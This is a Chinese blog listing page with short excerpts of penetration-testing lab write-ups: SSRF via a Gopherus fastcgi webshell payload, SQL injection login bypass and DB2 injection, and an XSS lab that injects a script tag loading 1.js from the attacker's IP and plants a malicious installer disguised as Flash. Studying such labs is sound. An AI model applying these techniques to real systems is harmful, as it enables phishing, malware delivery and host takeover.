- 博客(8)
- 收藏
- 关注
原创 CTFHub-SSRF解析合集
1.打开靶场和kali,在kali上打开 Gopherus-master 工具运行, 由于题目为 fastcgi 协议,所以指定 fastcgi, 提交一个靶场内的php文件地址,建议为默认的 index.php ,输入一句话木马,生成payload。1.打开靶场和kali,在kali上打开 Gopherus-master 工具运行, 由于题目为 fastcgi 协议,所以指定 fastcgi, 提交一个靶场内的php文件地址,建议为默认的 index.php ,输入一句话木马,生成payload。
2024-07-24 20:20:04
502
原创 xss flash 钓鱼获取主机控制权
注:改名是因为 index.html 代码中点击下载的路径为 ./flashcenter_pp_ax_install_cn.exe 相比较改文件中不知道有几处的代码,直接改名更轻松。注:修改完后图标未变可能是因为有缓存,将其拉倒桌面或在index.html点击下载后发现图标改变。<script src="http://物理机ip/1.js"></script>点击下载,完成后进行安装,发现 kali 成功监听。将压缩后的安装包拖入软件,替换图标后保存。将原安装包拖入软件,保存其图标至桌面。
2024-07-23 20:22:16
410
原创 墨者学院-SQL注入漏洞测试(登录绕过)解析
1.打开靶场,发现是登录页面,并且没有其他页面,直接抓包并发送重放器2.题目说明蹦数据库使用管理员用户,且密码复杂,所以直接在用户名处注入3.闭合后,由于账户正确,整条语句正确,所以无需密码,直接登录到了后台
2024-07-22 19:41:05
155
原创 墨者学院-SQL手工注入漏洞测试(Db2数据库)解析
由于是Db2数据库,所以当查询不到列时,直接指定列名,根据ID猜测name与password为大写,若未查到,可换username,userpassword等。通过题目得知本题为Db2数据库,故得知数据库为 DB2INST1。切记查询时带上ID一起查询,否则查出的数据是错误的,无法登陆。
2024-07-22 19:38:06
261
原创 墨者学院-SQL注入漏洞测试(POST)解析
正常流程应该是查到回显点后,在其位置查所在数据库,数据表,列名以获取账号密码登录后获取 key ,但这里不知道为什么直接登录到了后台,直接获取了key。注:此处不可使用 --+ 闭合, + 会被识别为空格,由于账号栏后方为空,空格会被省略,使用 # 即可。order by 3 未报错,order by 4 报错,证明有三列数据。在name之后加单引号引起报错,则name可作为注入点。
2024-07-22 19:35:00
173
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人